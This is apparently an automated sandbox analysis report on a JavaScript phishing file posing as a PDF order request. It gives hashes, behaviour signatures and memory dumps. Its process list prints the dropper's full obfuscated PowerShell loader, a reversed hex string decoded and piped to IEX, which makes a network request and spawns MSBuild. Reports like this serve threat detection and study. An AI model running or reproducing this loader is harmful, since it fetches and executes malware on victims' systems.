Overview

overview

8

Static

static

FIRST ORDE...pdf.JS

windows7_x64

8

FIRST ORDE...pdf.JS

windows10_x64

8

Analysis

  • max time kernel
    14s
  • max time network
    130s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-01-2021 07:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FIRST ORDER REQUEST FOR THE YEAR-pdf.JS

  • Size

    2KB

  • MD5

    c6fabd3d94e10f14a551b82b0fea4f55

  • SHA1

    e534c526d89b470dca1d29a7b8b54ae65286ab26

  • SHA256

    b2ab955ce80ce28915ebb5297029cc9fd65720b5aec3b56840f8e93f3b6c1379

  • SHA512

    34451f45717f468eec0f8b764c2f013bb5a1fbbe68c1c264144dec79af8abbfa2cf6e83c0a0c4888b68317e0d6ed492b698c041ae771e1385282049569214c20

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\FIRST ORDER REQUEST FOR THE YEAR-pdf.JS"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $WBzmJ='D4#C7#72#72#02#E6#96#F6#A6#D2#02#37#27#16#86#34#96#96#36#37#16#42#02#D3#76#E6#96#27#47#35#96#96#36#37#16#42#B3#D7#22#F5#42#87#03#22#D5#56#47#97#26#B5#D5#27#16#86#36#B5#B7#02#47#36#56#A6#26#F4#D2#86#36#16#54#27#F6#64#C7#02#92#72#E5#72#82#47#96#C6#07#37#E2#67#D6#42#02#D3#37#27#16#86#34#96#96#36#37#16#42#B3#92#72#76#07#A6#E2#23#B4#F2#27#16#E2#D6#F6#36#E2#37#56#C6#26#56#57#D6#27#16#36#96#67#F2#F2#A3#07#47#47#86#72#C2#46#F6#86#47#56#D4#A3#A3#D5#56#07#97#45#C6#C6#16#34#E2#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#B5#C2#72#76#E6#96#27#47#72#02#B2#02#72#35#46#16#72#02#B2#02#72#F6#C6#E6#72#02#B2#02#72#77#F6#44#72#C2#97#47#47#42#82#56#D6#16#E6#97#24#C6#C6#16#34#A3#A3#D5#E6#F6#96#47#36#16#27#56#47#E6#94#E2#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#B5#02#D3#67#D6#42#B3#92#72#36#96#37#16#24#C6#16#57#37#96#65#E2#47#66#F6#37#F6#27#36#96#D4#72#82#56#D6#16#E4#C6#16#96#47#27#16#05#86#47#96#75#46#16#F6#C4#A3#A3#D5#97#C6#26#D6#56#37#37#14#E2#E6#F6#96#47#36#56#C6#66#56#25#E2#D6#56#47#37#97#35#B5#02#D5#46#96#F6#67#B5#B3#D4#C7#72#92#47#E6#56#72#B2#72#96#C6#34#26#72#B2#72#56#75#E2#47#72#B2#72#56#E4#02#47#36#72#B2#72#56#A6#26#F4#72#B2#72#D2#77#56#E4#82#72#D3#97#47#47#42#B3#23#23#07#42#02#D3#02#C6#F6#36#F6#47#F6#27#05#97#47#96#27#57#36#56#35#A3#A3#D5#27#56#76#16#E6#16#D4#47#E6#96#F6#05#56#36#96#67#27#56#35#E2#47#56#E4#E2#D6#56#47#37#97#35#B5#B3#92#23#73#03#33#02#C2#D5#56#07#97#45#C6#F6#36#F6#47#F6#27#05#97#47#96#27#57#36#56#35#E2#47#56#E4#E2#D6#56#47#37#97#35#B5#82#47#36#56#A6#26#F4#F6#45#A3#A3#D5#D6#57#E6#54#B5#02#D3#02#23#23#07#42#B3#92#76#E6#96#07#42#82#02#C6#96#47#E6#57#02#D7#47#56#96#57#15#D2#02#13#02#47#E6#57#F6#36#D2#02#D6#F6#36#E2#56#C6#76#F6#F6#76#02#07#D6#F6#36#D2#02#E6#F6#96#47#36#56#E6#E6#F6#36#D2#47#37#56#47#02#D3#02#76#E6#96#07#42#B7#02#F6#46#B3#56#E6#F6#26#45#42#02#D4#02#C6#16#37#B3#92#72#94#72#C2#72#E3#72#82#56#36#16#C6#07#56#27#E2#72#85#54#E3#72#D3#56#E6#F6#26#45#42';$text =$WBzmJ.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('#') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4956
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
          PID:4424

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4424-13-0x0000000005280000-0x0000000005281000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4424-8-0x0000000000400000-0x000000000043C000-memory.dmp

      Filesize

      240KB

      Download

    • memory/4424-9-0x00000000004375FE-mapping.dmp

      Download

    • memory/4424-10-0x00000000735D0000-0x0000000073CBE000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/4424-14-0x0000000004E20000-0x0000000004E21000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4424-15-0x0000000004EC0000-0x0000000004EC1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4424-16-0x0000000005AE0000-0x0000000005AE1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4956-3-0x00007FF8643D0000-0x00007FF864DBC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/4956-4-0x000001A2FE620000-0x000001A2FE621000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4956-5-0x000001A2FEBA0000-0x000001A2FEBA1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4956-6-0x000001A2FE690000-0x000001A2FE698000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4956-7-0x000001A2FE660000-0x000001A2FE666000-memory.dmp

      Filesize

      24KB

      Download

    • memory/4956-2-0x0000000000000000-mapping.dmp

      Download